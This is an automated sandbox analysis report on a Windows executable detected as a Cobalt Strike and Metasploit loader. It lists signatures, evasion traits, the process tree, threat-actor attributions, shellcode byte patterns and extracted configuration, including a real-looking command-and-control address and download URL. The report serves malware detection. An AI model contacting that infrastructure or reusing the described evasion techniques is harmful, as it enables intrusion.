Windows Analysis Report
DChOtFdp9T.exe

Overview

General Information

Sample name: DChOtFdp9T.exe
renamed because original name is a hash value
Original sample name: 8ee41e146f682cfed19648f1ccb68bfa.exe
Analysis ID: 1582596
MD5: 8ee41e146f682cfed19648f1ccb68bfa
SHA1: a49dc5ca5ac1cd8311a04804aed8d57c572974a2
SHA256: bf1b7e92893315f4c17394356ff7418fb6ef80a8cfc8e43d7905e8f2230fb77e
Tags: CobaltStrike, exe, user-abuse_ch
Infos:

Detection

CobaltStrike, Metasploit
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Yara detected CobaltStrike
Yara detected Metasploit Payload
Yara detected Python Injector
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found pyInstaller with non standard icon
AV process strings found (often used to terminate AV products)
Binary contains a suspicious time stamp
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to detect virtual machines (SGDT)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Extensive use of GetProcAddress (often used to hide API calls)
Found dropped PE file which has not been started or loaded
Found evasive API chain checking for process token information
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
Internet Provider seen in connection with other malware
One or more processes crash
PE file contains executable resources (Code or Archives)
PE file contains sections with non-standard names
PE file does not import any functions
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • DChOtFdp9T.exe (PID: 5640 cmdline: "C:\Users\user\Desktop\DChOtFdp9T.exe" MD5: 8EE41E146F682CFED19648F1CCB68BFA)
    • DChOtFdp9T.exe (PID: 4020 cmdline: "C:\Users\user\Desktop\DChOtFdp9T.exe" MD5: 8EE41E146F682CFED19648F1CCB68BFA)
      • WerFault.exe (PID: 6760 cmdline: C:\Windows\system32\WerFault.exe -u -p 4020 -s 1316 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)
  • cleanup
Name: Cobalt Strike, CobaltStrike
Description: Cobalt Strike is a paid penetration testing product that allows an attacker to deploy an agent named 'Beacon' on the victim machine. Beacon includes a wealth of functionality to the attacker, including, but not limited to command execution, key logging, file transfer, SOCKS proxying, privilege escalation, mimikatz, port scanning and lateral movement. Beacon is in-memory/file-less, in that it consists of stageless or multi-stage shellcode that once loaded by exploiting a vulnerability or executing a shellcode loader, will reflectively load itself into the memory of a process without touching the disk. It supports C2 and staging over HTTP, HTTPS, DNS, SMB named pipes as well as forward and reverse TCP; Beacons can be daisy-chained. Cobalt Strike comes with a toolkit for developing shellcode loaders, called Artifact Kit. The Beacon implant has become popular amongst targeted attackers and criminal users as it is well written, stable, and highly customizable.
Attribution:
  • APT 29
  • APT32
  • APT41
  • AQUATIC PANDA
  • Anunak
  • Cobalt
  • Codoso
  • CopyKittens
  • DarkHydrus
  • Earth Baxia
  • FIN6
  • FIN7
  • Leviathan
  • Mustang Panda
  • Shell Crew
  • Stone Panda
  • TianWu
  • UNC1878
  • UNC2452
  • Winnti Umbrella
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.cobalt_strike
{"C2Server": "http://01.42.238.250:443/Ye3l", "User Agent": "User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)\r\n"}
{"Headers": "User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)\r\n", "Type": "Metasploit Download", "URL": "http://101.42.238.250/Ye3l"}
Source | Rule | Description | Author | Strings
C:\ProgramData\Microsoft\Windows\WER\Temp\WER84.tmp.dmp | Windows_Trojan_Metasploit_7bc0f998 | Identifies the API address lookup function leverage by metasploit shellcode | unknown
  • 0x13985:$a1: 48 31 D2 65 48 8B 52 60 48 8B 52 18 48 8B 52 20 48 8B 72 50 48 0F B7 4A 4A 4D 31 C9 48 31 C0 AC 3C 61
C:\ProgramData\Microsoft\Windows\WER\Temp\WER84.tmp.dmp | Windows_Trojan_Metasploit_c9773203 | Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families. | unknown
  • 0x139f1:$a: 48 31 C0 AC 41 C1 C9 0D 41 01 C1 38 E0 75 F1 4C 03 4C 24 08 45 39 D1
Source | Rule | Description | Author | Strings
00000001.00000002.1873004013.000001780A5A3000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_MetasploitPayload_3 | Yara detected Metasploit Payload | Joe Security
00000001.00000002.1873004013.000001780A5A3000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_CobaltStrike_3 | Yara detected CobaltStrike | Joe Security
00000001.00000002.1873004013.000001780A5A3000.00000004.00000020.00020000.00000000.sdmp | Windows_Trojan_Metasploit_7bc0f998 | Identifies the API address lookup function leverage by metasploit shellcode | unknown
  • 0x22d01:$a1: 48 31 D2 65 48 8B 52 60 48 8B 52 18 48 8B 52 20 48 8B 72 50 48 0F B7 4A 4A 4D 31 C9 48 31 C0 AC 3C 61
00000001.00000002.1873004013.000001780A5A3000.00000004.00000020.00020000.00000000.sdmp | Windows_Trojan_Metasploit_c9773203 | Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families. | unknown
  • 0x22d6d:$a: 48 31 C0 AC 41 C1 C9 0D 41 01 C1 38 E0 75 F1 4C 03 4C 24 08 45 39 D1
00000001.00000002.1874893653.000001780BD80000.00000040.00001000.00020000.00000000.sdmp | JoeSecurity_MetasploitPayload_3 | Yara detected Metasploit Payload | Joe Security
        No Sigma rule has matched
        No Suricata rule has matched

        AV Detection

        Source: 00000001.00000002.1873004013.000001780A5A3000.00000004.00000020.00020000.00000000.sdmp, Malware Configuration Extractor: CobaltStrike {"C2Server": "http://01.42.238.250:443/Ye3l", "User Agent": "User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)\r\n"}
        Source: 00000001.00000002.1873004013.000001780A5A3000.00000004.00000020.00020000.00000000.sdmp, Malware Configuration Extractor: Metasploit {"Headers": "User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)\r\n", "Type": "Metasploit Download", "URL": "http://101.42.238.250/Ye3l"}
        Source: DChOtFdp9T.exe, Virustotal: Detection: 63%
        Source: DChOtFdp9T.exe, ReversingLabs: Detection: 44%
        Source: Submitted Sample, Integrated Neural Analysis Model: Matched 99.8% probability
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeCode function: 1_2_00007FFDFF2792E0 CRYPTO_free,CRYPTO_malloc,ERR_new,ERR_set_debug,ERR_set_error,1_2_00007FFDFF2792E0
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeCode function: 1_2_00007FFDFF26D170 CRYPTO_THREAD_write_lock,OPENSSL_sk_new_null,OPENSSL_LH_delete,OPENSSL_sk_push,OPENSSL_LH_set_down_load,CRYPTO_THREAD_unlock,OPENSSL_sk_pop_free,1_2_00007FFDFF26D170
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeCode function: 1_2_00007FFDFF2A1170 ERR_new,ERR_set_debug,CRYPTO_clear_free,1_2_00007FFDFF2A1170
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeCode function: 1_2_00007FFDFF24F160 CRYPTO_free,CRYPTO_memdup,1_2_00007FFDFF24F160
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeCode function: 1_2_00007FFDFF241A23 BN_dup,BN_dup,BN_dup,BN_dup,BN_dup,BN_dup,BN_dup,BN_dup,CRYPTO_strdup,CRYPTO_strdup,ERR_new,ERR_set_debug,ERR_set_error,CRYPTO_free,CRYPTO_free,BN_free,BN_free,BN_free,BN_free,BN_free,BN_free,BN_free,BN_free,1_2_00007FFDFF241A23
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeCode function: 1_2_00007FFDFF241B90 CRYPTO_malloc,ERR_new,ERR_set_debug,ERR_set_error,CRYPTO_free,1_2_00007FFDFF241B90
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeCode function: 1_2_00007FFDFF241262 X509_free,EVP_PKEY_free,OPENSSL_sk_pop_free,CRYPTO_free,1_2_00007FFDFF241262
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeCode function: 1_2_00007FFDFF2A7230 CRYPTO_free,ERR_new,ERR_set_debug,CRYPTO_free,1_2_00007FFDFF2A7230
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeCode function: 1_2_00007FFDFF24D227 CRYPTO_free,CRYPTO_strdup,ERR_new,ERR_set_debug,ERR_set_error,ERR_new,ERR_set_debug,ERR_set_error,ERR_new,ERR_set_debug,ERR_set_error,1_2_00007FFDFF24D227
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeCode function: 1_2_00007FFDFF269080 CRYPTO_free,EVP_PKEY_free,CRYPTO_free,1_2_00007FFDFF269080
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeCode function: 1_2_00007FFDFF26F070 CRYPTO_zalloc,ERR_new,ERR_set_debug,ERR_set_error,_time64,CRYPTO_THREAD_lock_new,ERR_new,ERR_set_debug,ERR_set_error,CRYPTO_free,ERR_new,ERR_set_debug,CRYPTO_new_ex_data,CRYPTO_THREAD_lock_free,ERR_new,ERR_set_debug,memcpy,1_2_00007FFDFF26F070
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeCode function: 1_2_00007FFDFF2BB070 ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,CRYPTO_free,CRYPTO_strndup,ERR_new,ERR_set_debug,ERR_new,ERR_new,ERR_set_debug,CRYPTO_free,CRYPTO_memdup,OPENSSL_cleanse,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,1_2_00007FFDFF2BB070
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeCode function: 1_2_00007FFDFF2A5070 BN_num_bits,BN_bn2bin,CRYPTO_free,CRYPTO_strdup,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,1_2_00007FFDFF2A5070
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeCode function: 1_2_00007FFDFF242374 CRYPTO_free,CRYPTO_memdup,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,1_2_00007FFDFF242374
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeCode function: 1_2_00007FFDFF2750D8 EVP_MAC_CTX_free,CRYPTO_free,1_2_00007FFDFF2750D8
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeCode function: 1_2_00007FFDFF2421DF CRYPTO_memcmp,1_2_00007FFDFF2421DF
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeCode function: 1_2_00007FFDFF2830A0 CRYPTO_free,CRYPTO_free,BN_free,BN_free,BN_free,BN_free,BN_free,BN_free,BN_free,BN_free,1_2_00007FFDFF2830A0
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeCode function: 1_2_00007FFDFF2414CE CRYPTO_free,CRYPTO_free,CRYPTO_memdup,ERR_new,ERR_set_debug,ERR_new,ERR_new,ERR_set_debug,1_2_00007FFDFF2414CE
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeCode function: 1_2_00007FFDFF2411A9 EVP_MAC_CTX_free,CRYPTO_free,1_2_00007FFDFF2411A9
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeCode function: 1_2_00007FFDFF289120 CRYPTO_malloc,ERR_new,ERR_set_debug,1_2_00007FFDFF289120
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeCode function: 1_2_00007FFDFF242144 EVP_CIPHER_get_mode,EVP_CIPHER_get_mode,EVP_CIPHER_get_iv_length,EVP_CIPHER_get_key_length,CRYPTO_malloc,ERR_new,ERR_set_debug,1_2_00007FFDFF242144
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeCode function: 1_2_00007FFDFF244FD0 CRYPTO_free,1_2_00007FFDFF244FD0
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeCode function: 1_2_00007FFDFF2420E5 CRYPTO_free,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,1_2_00007FFDFF2420E5
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeCode function: 1_2_00007FFDFF242117 ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,CRYPTO_free,CRYPTO_malloc,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,CRYPTO_free,CRYPTO_free,CRYPTO_memdup,ERR_new,ERR_set_debug,1_2_00007FFDFF242117
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeCode function: 1_2_00007FFDFF24117C _time64,OPENSSL_LH_retrieve,OPENSSL_LH_delete,CRYPTO_THREAD_unlock,1_2_00007FFDFF24117C
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeCode function: 1_2_00007FFDFF288E90 CRYPTO_malloc,CRYPTO_free,CRYPTO_malloc,ERR_new,ERR_set_debug,1_2_00007FFDFF288E90
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeCode function: 1_2_00007FFDFF24236A CRYPTO_malloc,ERR_new,ERR_set_debug,ERR_set_error,memcpy,CRYPTO_free,CRYPTO_free,1_2_00007FFDFF24236A
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeCode function: 1_2_00007FFDFF24CEA0 CRYPTO_free,OPENSSL_sk_pop_free,CRYPTO_free,CRYPTO_clear_free,CRYPTO_free,CRYPTO_free,EVP_PKEY_free,EVP_PKEY_free,CRYPTO_free,CRYPTO_free,memset,CRYPTO_free,1_2_00007FFDFF24CEA0
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeCode function: 1_2_00007FFDFF2417E9 ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,memcmp,CRYPTO_free,CRYPTO_malloc,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,memcmp,ERR_new,CRYPTO_memdup,ERR_new,ERR_new,ERR_new,ERR_set_debug,1_2_00007FFDFF2417E9
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeCode function: 1_2_00007FFDFF2B2EE0 CRYPTO_memcmp,1_2_00007FFDFF2B2EE0
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeCode function: 1_2_00007FFDFF24222F ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,CRYPTO_clear_free,1_2_00007FFDFF24222F
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeCode function: 1_2_00007FFDFF241771 CRYPTO_free,1_2_00007FFDFF241771
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeCode function: 1_2_00007FFDFF25EDC1 ERR_new,ERR_set_debug,ERR_set_error,CRYPTO_free,ERR_new,ERR_set_debug,ERR_set_error,BUF_MEM_free,EVP_MD_CTX_free,X509_free,X509_VERIFY_PARAM_move_peername,CRYPTO_free,1_2_00007FFDFF25EDC1
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeCode function: 1_2_00007FFDFF241B54 memcmp,ERR_new,ERR_set_debug,ERR_new,ERR_new,ERR_set_debug,memcmp,EVP_CIPHER_CTX_free,CRYPTO_free,ERR_new,ERR_set_debug,CRYPTO_free,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,memcmp,memcmp,ERR_new,ERR_set_debug,memcpy,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,CRYPTO_free,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_new,ERR_new,ERR_set_debug,ERR_new,ERR_new,ERR_new,ERR_set_debug,CRYPTO_free,1_2_00007FFDFF241B54
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeCode function: 1_2_00007FFDFF241811 CRYPTO_free,CRYPTO_free,BN_free,BN_free,BN_free,BN_free,BN_free,BN_free,BN_free,BN_free,1_2_00007FFDFF241811
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeCode function: 1_2_00007FFDFF2422D9 CRYPTO_malloc,CONF_parse_list,CRYPTO_memdup,CRYPTO_free,CRYPTO_free,1_2_00007FFDFF2422D9
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeCode function: 1_2_00007FFDFF288C80 CRYPTO_free,1_2_00007FFDFF288C80
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeCode function: 1_2_00007FFDFF28EC70 CRYPTO_free,1_2_00007FFDFF28EC70
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeCode function: 1_2_00007FFDFF24257C ERR_new,ERR_set_debug,CRYPTO_free,BIO_clear_flags,BIO_set_flags,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_new,ERR_set_debug,ERR_new,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,memcpy,OPENSSL_cleanse,1_2_00007FFDFF24257C
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeCode function: 1_2_00007FFDFF298CA0 CRYPTO_free,CRYPTO_strndup,1_2_00007FFDFF298CA0
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeCode function: 1_2_00007FFDFF241CBC EVP_MD_get_size,ERR_new,ERR_set_debug,RAND_bytes_ex,ERR_new,ERR_set_debug,_time64,CRYPTO_free,CRYPTO_memdup,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,1_2_00007FFDFF241CBC
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeCode function: 1_2_00007FFDFF288D40 OPENSSL_cleanse,CRYPTO_free,1_2_00007FFDFF288D40
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeCode function: 1_2_00007FFDFF24136B ERR_new,ERR_set_debug,CRYPTO_THREAD_read_lock,CRYPTO_THREAD_unlock,ERR_new,ERR_set_debug,CRYPTO_THREAD_unlock,CRYPTO_THREAD_unlock,memset,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,1_2_00007FFDFF24136B
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeCode function: 1_2_00007FFDFF25CD30 CRYPTO_free,CRYPTO_free,CRYPTO_free_ex_data,OPENSSL_LH_free,X509_STORE_free,CTLOG_STORE_free,OPENSSL_sk_free,OPENSSL_sk_free,OPENSSL_sk_free,OPENSSL_sk_pop_free,OPENSSL_sk_pop_free,OPENSSL_sk_pop_free,OPENSSL_sk_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_secure_free,EVP_MD_get0_provider,EVP_MD_free,EVP_MD_get0_provider,EVP_MD_free,EVP_CIPHER_get0_provider,EVP_CIPHER_free,EVP_MD_get0_provider,EVP_MD_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_THREAD_lock_free,CRYPTO_free,CRYPTO_free,1_2_00007FFDFF25CD30
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeCode function: 1_2_00007FFDFF241A0F ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,EVP_CIPHER_CTX_get0_cipher,EVP_CIPHER_get_flags,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,EVP_MD_CTX_get0_md,EVP_MD_get_size,CRYPTO_memcmp,ERR_set_mark,ERR_clear_last_mark,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,CRYPTO_zalloc,ERR_new,ERR_set_debug,ERR_pop_to_mark,ERR_clear_last_mark,ERR_new,ERR_set_debug,CRYPTO_free,CRYPTO_free,EVP_MD_CTX_get0_md,CRYPTO_memcmp,ERR_new,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_new,ERR_new,strncmp,strncmp,strncmp,strncmp,strncmp,ERR_new,ERR_set_debug,ERR_new,ERR_new,ERR_set_debug,ERR_new,ERR_new,ERR_set_debug,ERR_new,ERR_new,ERR_set_debug,1_2_00007FFDFF241A0F
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeCode function: 1_2_00007FFDFF28EC10 CRYPTO_free,1_2_00007FFDFF28EC10
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeCode function: 1_2_00007FFDFF244C00 CRYPTO_zalloc,ERR_new,ERR_set_debug,ERR_set_error,1_2_00007FFDFF244C00
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeCode function: 1_2_00007FFDFF241AB4 CRYPTO_free,CRYPTO_free,CRYPTO_free,ERR_new,ERR_set_debug,CRYPTO_free,ERR_new,ERR_set_debug,ERR_new,CRYPTO_free,CRYPTO_memdup,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_new,ERR_new,ERR_set_debug,1_2_00007FFDFF241AB4
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeCode function: 1_2_00007FFDFF2A4C40 ERR_new,ERR_set_debug,X509_get0_pubkey,ERR_new,ERR_set_debug,CRYPTO_malloc,ERR_new,ERR_set_debug,RAND_bytes_ex,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,EVP_PKEY_CTX_new_from_pkey,EVP_PKEY_encrypt_init,EVP_PKEY_encrypt,EVP_PKEY_encrypt,EVP_PKEY_CTX_free,ERR_new,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,CRYPTO_clear_free,EVP_PKEY_CTX_free,1_2_00007FFDFF2A4C40
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeCode function: 1_2_00007FFDFF24114F CRYPTO_free,ERR_new,ERR_set_debug,1_2_00007FFDFF24114F
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeCode function: 1_2_00007FFDFF266AB7 CRYPTO_malloc,ERR_new,ERR_set_debug,CRYPTO_clear_free,OPENSSL_LH_num_items,OPENSSL_LH_num_items,1_2_00007FFDFF266AB7
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeCode function: 1_2_00007FFDFF26EB10 CRYPTO_THREAD_write_lock,OPENSSL_LH_retrieve,OPENSSL_LH_delete,CRYPTO_THREAD_unlock,1_2_00007FFDFF26EB10
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeCode function: 1_2_00007FFDFF25EB48 CRYPTO_free,1_2_00007FFDFF25EB48
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeCode function: 1_2_00007FFDFF244B30 CRYPTO_zalloc,ERR_new,ERR_set_debug,ERR_set_error,1_2_00007FFDFF244B30
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeCode function: 1_2_00007FFDFF241460 CRYPTO_malloc,ERR_new,ERR_set_debug,ERR_set_error,BIO_snprintf,1_2_00007FFDFF241460
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeCode function: 1_2_00007FFDFF256B20 CRYPTO_THREAD_run_once,OPENSSL_sk_find,OPENSSL_sk_value,EVP_CIPHER_fetch,EVP_CIPHER_get_flags,1_2_00007FFDFF256B20
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeCode function: 1_2_00007FFDFF254990 i2d_X509_NAME,i2d_X509_NAME,memcmp,CRYPTO_free,CRYPTO_free,1_2_00007FFDFF254990
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeCode function: 1_2_00007FFDFF242185 ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,EVP_PKEY_get1_encoded_public_key,CRYPTO_free,ERR_new,ERR_new,ERR_set_debug,EVP_PKEY_free,CRYPTO_free,ERR_new,ERR_set_debug,1_2_00007FFDFF242185
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeCode function: 1_2_00007FFDFF24204F CRYPTO_free,CRYPTO_malloc,ERR_new,RAND_bytes_ex,ERR_new,ERR_new,ERR_new,ERR_new,ERR_set_debug,1_2_00007FFDFF24204F
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeCode function: 1_2_00007FFDFF2417DF ERR_new,ERR_set_debug,ERR_set_error,CRYPTO_realloc,ERR_new,ERR_set_debug,ERR_set_error,CRYPTO_realloc,ERR_new,ERR_set_debug,ERR_set_error,1_2_00007FFDFF2417DF
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeCode function: 1_2_00007FFDFF241893 ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,CRYPTO_strdup,ERR_new,ERR_set_debug,1_2_00007FFDFF241893
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeCode function: 1_2_00007FFDFF2989F0 CRYPTO_free,CRYPTO_memdup,1_2_00007FFDFF2989F0
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeCode function: 1_2_00007FFDFF2424EB CRYPTO_malloc,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_new,ERR_set_debug,1_2_00007FFDFF2424EB
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeCode function: 1_2_00007FFDFF241492 ERR_new,ERR_set_debug,ERR_set_error,CRYPTO_malloc,ERR_new,ERR_set_debug,ERR_set_error,CRYPTO_free,CRYPTO_free,1_2_00007FFDFF241492
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeCode function: 1_2_00007FFDFF282A50 SRP_Calc_u_ex,BN_num_bits,CRYPTO_malloc,ERR_new,ERR_set_debug,BN_bn2bin,BN_clear_free,BN_clear_free,1_2_00007FFDFF282A50
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeCode function: 1_2_00007FFDFF241A05 ERR_new,ERR_set_debug,ERR_set_error,ASN1_item_free,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,memcpy,memcpy,_time64,X509_free,memcpy,CRYPTO_free,ERR_new,ERR_set_debug,CRYPTO_free,CRYPTO_free,ASN1_item_free,1_2_00007FFDFF241A05
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeCode function: 1_2_00007FFDFF2B8870 ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,OPENSSL_sk_free,OPENSSL_sk_free,CRYPTO_free,CRYPTO_free,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,memcmp,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,OPENSSL_sk_num,OPENSSL_sk_value,OPENSSL_sk_num,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,memcpy,OPENSSL_sk_num,OPENSSL_sk_value,OPENSSL_sk_num,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,CRYPTO_memcmp,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,OPENSSL_sk_free,OPENSSL_sk_dup,OPENSSL_sk_free,OPENSSL_sk_dup,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,OPENSSL_sk_num,OPENSSL_sk_value,OPENSSL_sk_num,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,OPENSSL_sk_num,OPENSSL_sk_value,OPENSSL_sk_free,ERR_new,ERR_set_debug,OPENSSL_sk_free,OPENSSL_sk_free,CRYPTO_free,CRYPTO_free,1_2_00007FFDFF2B8870
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeCode function: 1_2_00007FFDFF2A4860 ERR_new,ERR_set_debug,memset,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,CRYPTO_memdup,CRYPTO_strdup,CRYPTO_free,CRYPTO_free,ERR_new,ERR_new,ERR_set_debug,OPENSSL_cleanse,OPENSSL_cleanse,CRYPTO_clear_free,CRYPTO_clear_free,1_2_00007FFDFF2A4860
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeCode function: 1_2_00007FFDFF2426B2 ERR_new,ERR_set_debug,ERR_set_error,CRYPTO_free,CRYPTO_strdup,1_2_00007FFDFF2426B2
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeCode function: 1_2_00007FFDFF28E8C0 CRYPTO_free,1_2_00007FFDFF28E8C0
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeCode function: 1_2_00007FFDFF24139D memcpy,CRYPTO_THREAD_read_lock,OPENSSL_LH_retrieve,CRYPTO_THREAD_unlock,CRYPTO_THREAD_unlock,1_2_00007FFDFF24139D
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeCode function: 1_2_00007FFDFF2BA8F0 EVP_PKEY_CTX_new_from_pkey,ERR_new,ERR_set_debug,EVP_PKEY_decrypt_init,ERR_new,ERR_set_debug,X509_get0_pubkey,ERR_clear_error,ASN1_item_d2i,ASN1_TYPE_get,ERR_new,ERR_set_debug,EVP_PKEY_decrypt,ERR_new,EVP_PKEY_CTX_ctrl,ERR_new,ERR_new,ERR_set_debug,EVP_PKEY_CTX_free,ASN1_item_free,1_2_00007FFDFF2BA8F0
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeCode function: 1_2_00007FFDFF2AC8E0 CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,memcpy,CRYPTO_free,CRYPTO_free,CRYPTO_free,1_2_00007FFDFF2AC8E0
